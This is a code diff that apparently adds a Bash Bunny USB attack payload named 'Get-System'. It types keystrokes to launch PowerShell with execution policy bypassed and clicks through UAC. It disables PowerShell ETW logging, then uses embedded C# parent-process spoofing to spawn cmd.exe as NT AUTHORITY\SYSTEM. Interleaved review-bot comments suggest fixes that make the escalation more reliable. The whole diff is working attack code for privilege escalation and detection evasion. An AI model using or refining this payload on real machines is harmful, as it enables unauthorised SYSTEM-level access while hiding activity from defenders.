diff --git a/payloads/library/execution/Get-System/payload.ps1 b/payloads/library/execution/Get-System/payload.ps1
new file mode 100644
index 00000000..499ab780
--- /dev/null
+++ b/payloads/library/execution/Get-System/payload.ps1
@@ -0,0 +1,36 @@
+#
+# Author: TW-D
+# Version: 1.0
+#
+
+# Disable "PowerShell" logging
+$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
+$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
+$etw_provider.SetValue($null, $event_provider)
+
+# Check if current process have "Administrator" privilege
+If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) {
+
+ # Check "SeDebugPrivilege" policy
+ $whoami_output = WHOAMI /PRIV | Select-String -Pattern "SeDebugPrivilege"
+ If ( ($whoami_output -clike "*Activ*") -Or ($whoami_output -clike "*Enabled*") ) { # For French/English OS
+
+ # Retrieves the processes belonging to the "SYSTEM" account
+ $system_processes = (Get-Process -IncludeUserName | ? {$_.UserName -like "*SYST*"}).Id # For English/French OS
+
+ # For each system PID, test to obtain the "SYSTEM" account via the parent process
+ Import-Module -Name ".\psgetsys.ps1"
+ $system_processes | ForEach-Object {
+ [MyProcess]::CreateProcessFromParent($_, "C:\WINDOWS\system32\cmd.exe", "/K ECHO Success > .\hak5_execution.txt")
+ Start-Sleep -Seconds 5
+ $success = Test-Path -Path "C:\WINDOWS\system32\hak5_execution.txt"
+ If ($success) {
+ # Cleanup
+ Remove-Item -Path "C:\WINDOWS\system32\hak5_execution.txt" -Force
+ Exit
+ }
+ }
+
+ }
+
+}
\ No newline at end of file
diff --git a/payloads/library/execution/Get-System/payload.txt b/payloads/library/execution/Get-System/payload.txt
new file mode 100644
index 00000000..5906d4f0
--- /dev/null
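Review bot: The success probe in the ForEach-Object block does not establish that the spawned cmd.exe runs as SYSTEM: `Test-Path -Path "C:\WINDOWS\system32\hak5_execution.txt"` is satisfied by any elevated process that can write to system32, and this code only runs after the elevated-Administrator check has passed, so a cmd.exe that CreateProcessFromParent ended up starting under the caller's own token (the C# side never checks whether the parent attribute was applied) is reported as success and the loop exits early. Have the child record its identity and check for the SYSTEM SID, using an absolute path on both sides since where the child's `.\` resolves is not established by these lines (powershell itself has been CD'd to the Bunny volume by payload.txt): `[MyProcess]::CreateProcessFromParent($_, "C:\WINDOWS\system32\cmd.exe", "/K WHOAMI /USER > C:\WINDOWS\system32\hak5_execution.txt")` and `$success = (Test-Path -Path "C:\WINDOWS\system32\hak5_execution.txt") -and (Select-String -Path "C:\WINDOWS\system32\hak5_execution.txt" -Pattern "S-1-5-18" -Quiet)`. The `Remove-Item` cleanup should also run when the probe fails for a PID, otherwise a stale marker from a non-SYSTEM attempt would be read as success on the next iteration. Note that the script exits silently when the Administrator or SeDebugPrivilege check fails, which is worth stating in the header comment since the launcher cannot observe it.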
+++ b/payloads/library/execution/Get-System/payload.txt
@@ -0,0 +1,78 @@
+#!/bin/bash
+#
+# Title: Get System Account
+#
+# Description: Spoofing "NT AUTHORITY\SYSTEM" via parent process using PowerShell and embedded C Sharp
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Execution
+# Target: Microsoft Windows 10
+# Attackmodes: HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# REQUIREMENTS
+# ===============
+# The target user must belong to the 'Administrator' group.
+# The target user have 'SeDebugPrivilege' token in 'Administrator' mode (by default).
+#
+# TOOLS
+# ===============
+# https://github.com/decoder-it/psgetsystem
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q GUI r
+Q DELAY 5000
+Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 1500
+Q CTRL-SHIFT ENTER
+Q DELAY 5000
+Q LEFTARROW
+Q DELAY 3000
+Q ENTER
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 2000
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1"
+Q ENTER
+
+######## FINISH ########
+
+LED FINISH
\ No newline at end of file
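Review bot: `LED FINISH` is set immediately after `Q STRING ".\payload.ps1"` / `Q ENTER` with no delay, so the FINISH status lights before the PowerShell script has even begun and says nothing about whether it ran; the STATUS table in the header presents it as a completion indicator. The elevation step is the fragile part: `Q CTRL-SHIFT ENTER`, `Q LEFTARROW`, `Q ENTER` assume the UAC consent dialog has taken focus within the fixed 5000 ms and that the "Yes" button sits to the left of the default, and if that fails the remaining keystrokes land in a non-elevated console where payload.ps1 exits silently on its Administrator check. At minimum add a delay before the final LED, e.g. `Q DELAY 15000` before `LED FINISH`, and change the header line to `# Green 1000ms VERYFAST blink followed by SOLID ... FINISH (keystrokes delivered; does not indicate the script succeeded)`. Documenting that the UAC keystroke sequence is layout- and timing-dependent under REQUIREMENTS would also save the next user a debugging session.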
diff --git a/payloads/library/execution/Get-System/psgetsys.ps1 b/payloads/library/execution/Get-System/psgetsys.ps1
new file mode 100644
index 00000000..11e3be49
--- /dev/null
+++ b/payloads/library/execution/Get-System/psgetsys.ps1
@@ -0,0 +1,162 @@
+#Simple powershell/C# to spawn a process under a different parent process
+#usage: import-module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(,)
+$mycode = @"
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Runtime.InteropServices;
+
+public class MyProcess
+{
+ [DllImport("kernel32.dll")]
+ static extern uint GetLastError();
+
+ [DllImport("kernel32.dll")]
+ [return: MarshalAs(UnmanagedType.Bool)]
+ static extern bool CreateProcess(
+ string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,
+ ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags,
+ IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo,
+ out PROCESS_INFORMATION lpProcessInformation);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ [return: MarshalAs(UnmanagedType.Bool)]
+ private static extern bool UpdateProcThreadAttribute(
+ IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue,
+ IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ [return: MarshalAs(UnmanagedType.Bool)]
+ private static extern bool InitializeProcThreadAttributeList(
+ IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ [return: MarshalAs(UnmanagedType.Bool)]
+ private static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ static extern bool CloseHandle(IntPtr hObject);
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+ struct STARTUPINFOEX
+ {
+ public STARTUPINFO StartupInfo;
+ public IntPtr lpAttributeList;
+ }
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+ struct STARTUPINFO
+ {
+ public Int32 cb;
+ public string lpReserved;
+ public string lpDesktop;
+ public string lpTitle;
+ public Int32 dwX;
+ public Int32 dwY;
+ public Int32 dwXSize;
+ public Int32 dwYSize;
+ public Int32 dwXCountChars;
+ public Int32 dwYCountChars;
+ public Int32 dwFillAttribute;
+ public Int32 dwFlags;
+ public Int16 wShowWindow;
+ public Int16 cbReserved2;
+ public IntPtr lpReserved2;
+ public IntPtr hStdInput;
+ public IntPtr hStdOutput;
+ public IntPtr hStdError;
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ internal struct PROCESS_INFORMATION
+ {
+ public IntPtr hProcess;
+ public IntPtr hThread;
+ public int dwProcessId;
+ public int dwThreadId;
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct SECURITY_ATTRIBUTES
+ {
+ public int nLength;
+ public IntPtr lpSecurityDescriptor;
+ public int bInheritHandle;
+ }
+
+ public static void CreateProcessFromParent(int ppid, string command, string cmdargs)
+ {
+ const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000;
+ const uint CREATE_NEW_CONSOLE = 0x00000010;
+ const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;
+
+
+ var pi = new PROCESS_INFORMATION();
+ var si = new STARTUPINFOEX();
+ si.StartupInfo.cb = Marshal.SizeOf(si);
+ IntPtr lpValue = IntPtr.Zero;
+ Process.EnterDebugMode();
+ try
+ {
+
+ var lpSize = IntPtr.Zero;
+ InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
+ si.lpAttributeList = Marshal.AllocHGlobal(lpSize);
+ InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, ref lpSize);
+ var phandle = Process.GetProcessById(ppid).Handle;
+ Console.WriteLine("[+] Got Handle for ppid: {0}", ppid);
+ lpValue = Marshal.AllocHGlobal(IntPtr.Size);
+ Marshal.WriteIntPtr(lpValue, phandle);
+
+ UpdateProcThreadAttribute(
+ si.lpAttributeList,
+ 0,
+ (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
+ lpValue,
+ (IntPtr)IntPtr.Size,
+ IntPtr.Zero,
+ IntPtr.Zero);
+
+ Console.WriteLine("[+] Updated proc attribute list");
+ var pattr = new SECURITY_ATTRIBUTES();
+ var tattr = new SECURITY_ATTRIBUTES();
+ pattr.nLength = Marshal.SizeOf(pattr);
+ tattr.nLength = Marshal.SizeOf(tattr);
+ Console.Write("[+] Starting " + command + "...");
+ var b= CreateProcess(command, cmdargs, ref pattr, ref tattr, false,EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref si, out pi);
+ Console.WriteLine(b+ " - pid: " + pi.dwProcessId+ " - Last error: " +GetLastError() );
+
+ }
+ finally
+ {
+
+ if (si.lpAttributeList != IntPtr.Zero)
+ {
+ DeleteProcThreadAttributeList(si.lpAttributeList);
+ Marshal.FreeHGlobal(si.lpAttributeList);
+ }
+ Marshal.FreeHGlobal(lpValue);
+
+ if (pi.hProcess != IntPtr.Zero)
+ {
+ CloseHandle(pi.hProcess);
+ }
+ if (pi.hThread != IntPtr.Zero)
+ {
+ CloseHandle(pi.hThread);
+ }
+ }
+ }
+
+}
+"@
+ Add-Type -TypeDefinition $mycode
+
+#Autoinvoke?
+ $cmdargs=""
+if($args.Length -eq 3)
+{
+ $cmdargs= $args[1] + " " + $args[2]
+}
+
+#[MyProcess]::CreateProcessFromParent($args[0],$args[1],$cmdargs)
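Review bot: The attribute update that actually performs the parent spoofing is never checked, and the error reporting around `CreateProcess` is unreliable: the return values of both `InitializeProcThreadAttributeList` calls and of `UpdateProcThreadAttribute` are discarded, so if the handle obtained for `ppid` cannot be applied as a parent the method still prints `[+] Updated proc attribute list` and reaches CreateProcess with an attribute list carrying no parent, starting `command` under the caller's own token, while `CreateProcess` is declared without `SetLastError = true` and the code P/Invokes `GetLastError()` directly, so the value printed on the `Console.WriteLine(b+ ...` line can be clobbered by the runtime's own Win32 calls between the two P/Invokes. Declare it as `[DllImport("kernel32.dll", SetLastError = true)]`, guard the update as `if (!UpdateProcThreadAttribute(si.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero)) { throw new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()); }`, and print `Marshal.GetLastWin32Error()` instead of `GetLastError()`. Because CreateProcessFromParent returns void, the PowerShell caller cannot distinguish a failed spawn from a successful one; returning `b` (or throwing when it is false) would let payload.ps1 skip its sleep-and-probe for PIDs that failed. `Process.EnterDebugMode()` is also never paired with `Process.LeaveDebugMode()` in the `finally`, so the calling process keeps SeDebugPrivilege enabled after the method returns.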